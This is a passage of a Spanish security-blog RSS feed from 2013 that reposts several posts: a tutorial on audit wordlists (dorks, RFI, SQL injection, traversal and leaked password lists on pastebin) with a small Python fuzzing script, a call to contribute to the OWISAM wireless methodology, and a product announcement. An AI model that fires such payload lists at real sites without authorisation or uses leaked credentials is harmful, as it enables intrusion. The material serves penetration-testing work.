/&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span lang="EN-GB"&gt;Teen finds bugs in Google, Facebook, Apple, Microsoft code&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/"&gt;&lt;span lang="EN-GB"&gt;http://news.cnet.com/8301-27080_3-57369971-245/teen-finds-bugs-in-google-facebook-apple-microsoft-code/&lt;/span&gt;&lt;/a&gt;&lt;span lang="EN-GB"&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right"&gt;&lt;br /&gt;Sergio de los Santos&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;&lt;a href="mailto:ssantos@hispasec.com"&gt;ssantos@hispasec.com&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div align="right" style="text-align: right;"&gt;&lt;br /&gt;Twitter: &lt;a href="http://www.twitter.com/ssantosv"&gt;@ssantosv&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/hispasec/zCAd/~4/UKZYxe_i5i4" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/paypal-no-paga-por-un-fallo-de.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/-iYh-72_U68k/UaTiqT-zczI/AAAAAAAACkI/9Nb01xecfYI/s72-c/xss-paypal.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-6315457746869112294</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:50.356-05:00</atom:updated><title>¿Necesitas listas de *?</title><description>&lt;a href="http://feedproxy.google.com/~r/hispasec/IcLa/~3/oC2xd0xZ2-M/necesitas-listas-de.html"&gt;¿Necesitas listas de *?&lt;/a&gt;: &lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Seguro que si haces auditorías de seguridad una de las colecciones más preciadas&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;de tu arsenal es la lista de dorks, RFIs, localizaciones del panel de&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;administración,&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;o esos chorizos para hacer escalado de directorios o la de inyecciones&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;SQL. También&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;no faltan listas de combinaciones usuario/password que como dijo Ken Thompson:&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Cuando dudes, ¡usa la fuerza bruta!&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;" /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Estas listas son muy útiles para pasarlas a herramientas tipo Burp, Cansina o&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;WFuzz. Incluso un simple (muy simple) script ad-hoc nos puede ayudar para lanzar&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;peticiones y comprobar su resultado:&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;&lt;br /&gt;&lt;/span&gt; &lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;pre style="background: #ffffff; color: black;"&gt;&lt;span style="color: maroon; font-weight: bold;"&gt;import&lt;/span&gt; sys&lt;br /&gt;&lt;span style="color: maroon; font-weight: bold;"&gt;import&lt;/span&gt; requests&lt;br /&gt;&lt;br /&gt;site&lt;span style="color: #808030;"&gt;,&lt;/span&gt; payload &lt;span style="color: #808030;"&gt;=&lt;/span&gt; &lt;span style="color: #808030;"&gt;(&lt;/span&gt;sys&lt;span style="color: #808030;"&gt;.&lt;/span&gt;argv&lt;span style="color: #808030;"&gt;[&lt;/span&gt;&lt;span style="color: #008c00;"&gt;1&lt;/span&gt;&lt;span style="color: #808030;"&gt;]&lt;/span&gt;&lt;span style="color: #808030;"&gt;,&lt;/span&gt; sys&lt;span style="color: #808030;"&gt;.&lt;/span&gt;argv&lt;span style="color: #808030;"&gt;[&lt;/span&gt;&lt;span style="color: #008c00;"&gt;2&lt;/span&gt;&lt;span style="color: #808030;"&gt;]&lt;/span&gt;&lt;span style="color: #808030;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;slap &lt;span style="color: #808030;"&gt;=&lt;/span&gt; &lt;span style="color: #0000e6;"&gt;''&lt;/span&gt;&lt;br /&gt;&lt;span style="color: maroon; font-weight: bold;"&gt;try&lt;/span&gt;&lt;span style="color: #808030;"&gt;:&lt;/span&gt;&lt;br /&gt;    slap &lt;span style="color: #808030;"&gt;=&lt;/span&gt; sys&lt;span style="color: #808030;"&gt;.&lt;/span&gt;argv&lt;span style="color: #808030;"&gt;[&lt;/span&gt;&lt;span style="color: #008c00;"&gt;3&lt;/span&gt;&lt;span style="color: #808030;"&gt;]&lt;/span&gt;&lt;br /&gt;&lt;span style="color: maroon; font-weight: bold;"&gt;except&lt;/span&gt;&lt;span style="color: #808030;"&gt;:&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: maroon; font-weight: bold;"&gt;pass&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;with &lt;span style="color: #e34adc;"&gt;open&lt;/span&gt;&lt;span style="color: #808030;"&gt;(&lt;/span&gt;payload&lt;span style="color: #808030;"&gt;,&lt;/span&gt; &lt;span style="color: #0000e6;"&gt;'r'&lt;/span&gt;&lt;span style="color: #808030;"&gt;)&lt;/span&gt; as payload&lt;span style="color: #808030;"&gt;:&lt;/span&gt;&lt;br /&gt;    &lt;span style="color: maroon; font-weight: bold;"&gt;for&lt;/span&gt; i &lt;span style="color: maroon; font-weight: bold;"&gt;in&lt;/span&gt; payload.readlines&lt;span style="color: #808030;"&gt;(&lt;/span&gt;&lt;span style="color: #808030;"&gt;)&lt;/span&gt;&lt;span style="color: #808030;"&gt;:&lt;/span&gt;&lt;br /&gt;        req &lt;span style="color: #808030;"&gt;=&lt;/span&gt; requests&lt;span style="color: #808030;"&gt;.&lt;/span&gt;get&lt;span style="color: #808030;"&gt;(&lt;/span&gt;site &lt;span style="color: #808030;"&gt;+&lt;/span&gt; i &lt;span style="color: #808030;"&gt;+&lt;/span&gt; slap&lt;span style="color: #808030;"&gt;)&lt;/span&gt;&lt;br /&gt;        &lt;span style="color: maroon; font-weight: bold;"&gt;print&lt;/span&gt; &lt;span style="color: #0000e6;"&gt;"%s %s %s"&lt;/span&gt; &lt;span style="color: #808030;"&gt;%&lt;/span&gt; &lt;span style="color: #808030;"&gt;(&lt;/span&gt;req&lt;span style="color: #808030;"&gt;.&lt;/span&gt;status_code&lt;span style="color: #808030;"&gt;,&lt;/span&gt; &lt;span style="color: #e34adc;"&gt;len&lt;/span&gt;&lt;span style="color: #808030;"&gt;(&lt;/span&gt;req&lt;span style="color: #808030;"&gt;.&lt;/span&gt;text&lt;span style="color: #808030;"&gt;)&lt;/span&gt;&lt;span style="color: #808030;"&gt;,&lt;/span&gt; req&lt;span style="color: #808030;"&gt;.&lt;/span&gt;url&lt;span style="color: #808030;"&gt;)&lt;/span&gt;&lt;br /&gt;&lt;/pre&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="color: #222222; font-family: arial,sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="color: #222222; font-family: arial,sans-serif; font-size: 13px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Una fuente bastante nutrida de este tipo de listas es la base de datos de dorks&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;de &lt;a href="http://www.exploit-db.com/google-dorks/"&gt;exploit-db&lt;/a&gt; &lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;o las listas&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;del proyecto&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;&lt;a href="https://code.google.com/p/fuzzdb/"&gt;fuzzdb&lt;/a&gt;,&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;&amp;nbsp;aunque este último lleva tiempo sin&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;ser actualizado.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Otra fuente de conocimiento son los sitios tipo pastebin. Nunca dejará&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;de sorprender&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;la cantidad de información curiosa (a veces rozando lo bizarro) que la&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;gente deja&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;colgada.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Por ejemplo, sin salirnos de pastebin&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;, una &lt;a href="http://pastebin.com/yaJD7Qi5"&gt;lista&lt;/a&gt;&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;para comprobar posibles scripts que pudieran contener una SQLi. Otra&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;por &lt;a href="http://pastebin.com/CRsx7mhK"&gt;aquí&lt;/a&gt; &lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;para el mismo cometido. &lt;a href="http://pastebin.com/s6WTWTvP"&gt;RFIs&lt;/a&gt; en formato dorks para Google&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-size: 12.727272033691406px;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;o como no, "etc/passwd" que continen nombres de usuario para nuestro diccionario&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;de &lt;a href="http://pastebin.com/EsdDuPCX"&gt;usernames&lt;/a&gt;&lt;/span&gt;. Como no, tampoco faltan las &lt;a href="http://pastebin.com/JmtNxcnB"&gt;lista&lt;/a&gt; de&amp;nbsp;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;passwords&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt; procedentes de los ataques, algunos &lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;ya históricos.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="clear: both; text-align: center;"&gt;&lt;br /&gt;&lt;a href="http://2.bp.blogspot.com/-jHidpiwoCXM/UaXbF1oIOvI/AAAAAAAAAEA/k4fb0nmjQl4/s1600/2013-05-29+08:22:44++00001.png" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="400" src="http://2.bp.blogspot.com/-jHidpiwoCXM/UaXbF1oIOvI/AAAAAAAAAEA/k4fb0nmjQl4/s400/2013-05-29+08:22:44++00001.png" width="311" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;Es evidente que se trata de información bastante heterogénea y tendríamos que&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;hacerla pasar por un filtro para acoplarla a nuestras listas, el más básico es&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;que las entradas no estén repetidas o que estén ordenadas por&lt;/span&gt;&lt;br /&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;porcentaje de éxito&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;encontrado en sucesivos usos. De esta forma no machacamos un objetivo y&amp;nbsp;&lt;/span&gt;&lt;span style="background-color: white; color: #222222; font-family: arial,sans-serif; font-size: 12.727272033691406px;"&gt;optimizamos el tiempo de auditoría.&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/necesitas-listas-de.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://2.bp.blogspot.com/-jHidpiwoCXM/UaXbF1oIOvI/AAAAAAAAAEA/k4fb0nmjQl4/s72-c/2013-05-29+08:22:44++00001.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-5445993158076241853</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:36.776-05:00</atom:updated><title>¡¡OWISAM os necesita!!</title><description>&lt;a href="http://feedproxy.google.com/~r/SecurityByDefault/~3/h9TGxGHBuZc/owisam-os-necesita.html"&gt;¡¡OWISAM os necesita!!&lt;/a&gt;: &lt;a href="http://1.bp.blogspot.com/-ZuSae_THcIo/UaESp1KigLI/AAAAAAAAIS4/jUc19im6CEA/s1600/7f2619d49bf81c1998bf158a2014e9f3.png" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="200" src="http://1.bp.blogspot.com/-ZuSae_THcIo/UaESp1KigLI/AAAAAAAAIS4/jUc19im6CEA/s200/7f2619d49bf81c1998bf158a2014e9f3.png" width="200" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;a href="https://www.owisam.org/en/Main_Page"&gt;OWISAM &lt;/a&gt;(Open WIreless Security Assessment Methodology), es una metodología abierta para el análisis de seguridad Wireless. Sus fundadores, los hermanos Tarascó, &lt;a href="http://es.slideshare.net/rootedcon/andrs-tarasco-y-miguel-tarasco-owisam-open-wireless-security-assessment-methodology-rooted-con-2013"&gt;la presentaron&lt;/a&gt; en la pasada RootedCon, para que todo aquel que estuviera interesado colaborase editando sus páginas y contribuyendo con ideas.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;A día de hoy, aun me pregunto cómo es posible que no existiese antes una metodología similar, con lo comunes que son las auditorias de redes inalámbricas. Si bien es cierto que &lt;a href="http://www.isecom.org/mirror/OSSTMM.3.pdf"&gt;OSSTMM &lt;/a&gt;incluye en el capítulo 9 vagas referencias, muy lejos queda, de lo que ya es hoy por hoy este proyecto.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Es en concepto y forma similar &amp;nbsp;a OWASP, donde se habla de controles técnicos a bajo nivel, herramientas y procedimientos para el análisis. Entre sus páginas ya hay algunas entradas creadas, como por ejemplo los riesgos &lt;a href="https://www.owisam.org/en/OWISAM_Top_10"&gt;Top 10&lt;/a&gt;:&lt;/div&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-_0spvXAnjXM/UaEUcjrXuRI/AAAAAAAAITI/0vKeXLE_6Sk/s1600/top10.jpg" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="264" src="http://4.bp.blogspot.com/-_0spvXAnjXM/UaEUcjrXuRI/AAAAAAAAITI/0vKeXLE_6Sk/s640/top10.jpg" width="640" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;OWISAM Top10&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Pero queda mucho trabajo por hacer, páginas que editar, procesos que documentar, textos que traducir e ideas que debatir. Hace falta que la comunidad una sus fuerza y se ponga las pilas, al igual que ocurrió en su momento con OWASP.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;table align="center" cellpadding="0" cellspacing="0" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-_kaWGiZOmW8/UaIBtJXjpuI/AAAAAAAAITU/mL9QJ_5qUik/s1600/810px-Esquema_metodologia_OWISAM.png" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" height="296" src="http://2.bp.blogspot.com/-_kaWGiZOmW8/UaIBtJXjpuI/AAAAAAAAITU/mL9QJ_5qUik/s400/810px-Esquema_metodologia_OWISAM.png" width="400" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;tr&gt;&lt;td style="text-align: center;"&gt;OWISAM: metodología de análisis&lt;/td&gt;&lt;/tr&gt;&lt;br /&gt;&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;En España y en Latinoamérica en general hay mucho talento en este campo, hay claros ejemplos como&amp;nbsp;&lt;a href="http://www.seguridadwireless.net/"&gt;seguridadwireless&lt;/a&gt;&amp;nbsp;y su&amp;nbsp;&lt;a href="http://www.wifislax.com/"&gt;wifislax&lt;/a&gt;, donde todos los temas que trata OWISAM seguramente se han tratado alguna vez. ¿Por qué no darle orden y forma? &amp;nbsp;Todo el mundo se beneficia, los auditores podrán saber qué y cómo mirar en una auditoría y aquellos que quieran ser auditados, sabrán que controles se han estudiado.&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;Para colaborar, la mejor forma es empezar por subscribirse en su lista de correo y ver en que se puede aportar, para ello, tan solo hace falta mandandar un mensaje a la dirección:&amp;nbsp;&lt;a href="mailto:owisam_es-subscribe@owisam.org"&gt;owisam_es-subscribe@owisam.org&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;img height="1" src="http://feeds.feedburner.com/~r/SecurityByDefault/~4/h9TGxGHBuZc" width="1" /&gt;&lt;div class="blogger-post-footer"&gt;@BIOHAZARD SIDE&lt;/div&gt;</description><link>http://ibiohazardi.blogspot.com/2013/06/owisam-os-necesita.html</link><author>noreply@blogger.com (El Bio Gamer)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="http://1.bp.blogspot.com/-ZuSae_THcIo/UaESp1KigLI/AAAAAAAAIS4/jUc19im6CEA/s72-c/7f2619d49bf81c1998bf158a2014e9f3.png" width="72"/><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-4636869601854204167.post-837560245703946304</guid><pubDate>Thu, 20 Jun 2013 15:23:00 +0000</pubDate><atom:updated>2013-06-20T10:23:25.700-05:00</atom:updated><title>Presentamos tiké</title><description>&lt;a href="http://www.securityartwork.es/2013/06/05/presentamos-tike/"&gt;Presentamos tiké&lt;/a&gt;: &lt;br /&gt;&lt;img alt="" src="http://www.securityartwork.es/wp-content/uploads/2013/05/Captura.png" style="float: left; margin: 0px 40px 15px 0px;" title="tike" width="200" /&gt;Security Art Work comenzó hace poco más de seis años por iniciativa del que escribe estas palabras, lo que hace que le tenga un especial cariño. Como sabrán, una de las políticas no escritas de Security Art Work siempre ha sido la ausencia de publicidad propia o ajena; Security Art Work fue creado para compartir conocimiento, no como una plataforma para hacer publicidad. &lt;br /&gt;Sin embargo, una vez al año —como mucho— utilizamos el blog como escaparate de algún hecho destacado relacionado con &lt;a href="http://www.s2grupo.es/"&gt;S2 Grupo&lt;/a&gt;, tras lo cual volvemos a la programación habitual. Hoy es uno de esos días, con una especial particularidad que ahora mismo entenderán.&lt;br /&gt;&lt;img src="http://www.securityartwork.es/wp-content/uploads/2013/06/lateral.jpg" style="border: 1px solid #ccc; float: right; margin: 0px 0px 20px 30px; padding: 1px; width: 300px;" /&gt;Hace aproximadamente un año, comencé a trabajar en una herramienta que mejorase la implantación y mantenimiento de un SGSI y diese respuesta a diversos problemas a los que en el pasado me he tenido que enfrentar. Esta idea inicial creció y con esfuerzo ha acabado convirtiéndose en una realidad, lo que nos lleva de nuevo hasta el día de hoy. Me siento especialmente orgulloso de presentar &lt;strong&gt;tiké®&lt;/strong&gt; en público: &lt;strong&gt;la herramienta de S2 Grupo para la gestión de referentes normativos y legales&lt;/strong&gt;. No sólo por mi papel en su nacimiento o como responsable funcional, sino sobre todo por todo el trabajo que nos ha costado llegar hasta aquí y que no me cabe duda de que ha valido la pena. &lt;br /&gt;No voy a entrar a detallar las funcionalidades de &lt;strong&gt;tiké®&lt;/strong&gt;, que pueden consultar en la &lt;a href="http://www.s2grupo.es/producto-tike.shtml"&gt;página web del producto&lt;/a&gt;. Pero sí que me gustaría comentar los pilares sobre los que descansa la aplicación, que soporta actualmente LOPD y SGSI, pero cuyo ámbito ya estamos ampliando al Esquema Nacional de Seguridad, la norma ISO 9001, la Ley de Protección de Infraestructuras Críticas y la norma ISO 22301 (continuidad de negocio):&lt;br /&gt;&lt;ul&gt;&lt;br /&gt;&lt;li style="margin-bottom: 20px;"&gt;&lt;strong&gt;Gestión integral&lt;/strong&gt;. Algunos de los principales problemas que encontramos en muchas organizaciones que desean adaptarse a la LOPD o implantar un SGSI son la ausencia de herramientas para abordar determinados aspectos requeridos por el referente en cuestión, la falta de mecanismos de control sobre las iniciativas o la ausencia de trazabilidad al utilizar documentos ofimáticos. Para hacer frente a esto &lt;strong&gt;tiké®&lt;/strong&gt; presenta un modelo integral en el que a través de una única herramienta es posible gestionar y llevar un control de todos los elementos necesarios: proyectos, tareas, catálogo de puestos, indicadores, sistema documental, suministradores, etc., con total trazabilidad de las modificaciones realizadas por cualquier usuario.&lt;/li&gt;&lt;br /&gt;&lt;li style="margin-bottom: 20px;"&gt;&lt;strong&gt;Usabilidad&lt;/strong&gt;. Seguro que esto les suena a típica frase de folleto comercial: “&lt;em&gt;hecho con las últimas tecnologías web&lt;/em&gt;” pero les aseguro que en este caso es verdad. Hemos trabajado mucho para que &lt;strong&gt;tiké®&lt;/strong&gt; se adapte de manera transparente a una resolución de 1920×1080 o a la de un iPad colocado en vertical (imagen de la derecha, por ejemplo), y para que todas las pantallas muestren una coherencia funcional y estética que permita un aprendizaje lo más rápido posible. Afortunadamente, ni la LOPD ni un SGSI son cuestiones de física nuclear y mantener o implantar cualquiera de estos sistemas no debería ser una tarea hercúlea, por lo que hemos intentado (y personalmente creo que hemos conseguido) que lo sencillo siga siendo sencillo y lo difícil sea lo menos complejo posible.&lt;/li&gt;&lt;br /&gt;&lt;li style="margin-bottom: 20px;"&gt;&lt;strong&gt;Modularidad&lt;/strong&gt;. Para hacer frente al problema de la duplicidad de elementos, el diseño de &lt;strong&gt;tiké®&lt;/strong&gt; sigue una filosofía según la cual un elemento no es una entidad “propiedad de” un sistema, sino de la Organización. Esto nos ha llevado a introducir dos niveles de modularidad. El primero en la concepción de las pantallas, donde se plantea un núcleo común y un conjunto de pantallas específicas de cada norma, y el segundo dentro de cada pantalla, de modo que algunos elementos, en ciertos casos, pueden contener información específica de una norma. Este enfoque, además de evitar duplicidades, facilita la gestión unificada de las entidades (proyectos, activos, incidencias…) desde un punto central y permite tener una visión global de la Organización.&lt;/li&gt;&lt;br /&gt;&lt;li style="margin-bottom: 20px;"&gt;&lt;strong&gt;Modelo SaaS&lt;/strong&gt;. Evidentemente, con esto no estamos inventando la rueda y por supuesto contemplamos modelos &lt;em&gt;in-house&lt;/em&gt; si el cliente así lo requiere. Sin embargo, desde su inicio &lt;strong&gt;tiké®&lt;/strong&gt; ha sido diseñado con una fuerte orientación SaaS. No sólo por las ventajas económicas que implica en el lado del cliente (el suyo) como en el del proveedor (el nuestro), sino también por la ubicuidad del acceso y disponibilidad de la herramienta en cualquier circunstancia, siempre con todas las garantías de seguridad y simplemente mediante el uso de un navegador web.&lt;/li&gt;&lt;br /&gt;&lt;/ul&gt;&lt;br /&gt;Estas características definen en esencia lo que hay detrás de &lt;strong&gt;tiké®&lt;/strong&gt;, aunque evidentemente hay mucho más que contar. Al igual que con este blog, seguimos trabajando para incorporar otros referentes así como mejorar los ya implementados y añadir funcionalidades que permitan al usuario una implantación y gestión óptimas. Tras casi un año trabajando en &lt;strong&gt;tiké®&lt;/strong&gt; con una implicación que va más allá de lo profesional sólo les puedo decir que, al menos en mi opinión, hemos conseguido crear una gran aplicación. Ahora es el turno de ustedes. Pueden unirse al grupo de ilustres clientes de &lt;strong&gt;tiké®&lt;/strong&gt; entre los cuales se encuentran Generalitat Valenciana, Colebega S.A. y S2 Grupo, como no podría ser de otra manera.&lt;br /&gt;Si quieren más información o desean ver una demo, pueden contactar conmigo vía mi correo electrónico: &lt;strong&gt;mbenet@s2grupo.es&lt;/strong&gt;, o a través de cualquiera de los canales de S2 Grupo: &lt;strong&gt;infotike@s2grupo.es&lt;/strong&gt; o &lt;strong&gt;902 88 29 92&lt;/strong&gt;.&lt;br /&gt;Mañana retomaremos, como siempre, la programación habitual.&lt;br /&gt;&lt;img alt="tike" src="http://www.securityartwork.es/wp-content/uploads/2013/06/imagen.jpg" style="margin: 5px 0px 0px 0px;" /&gt;&lt;div 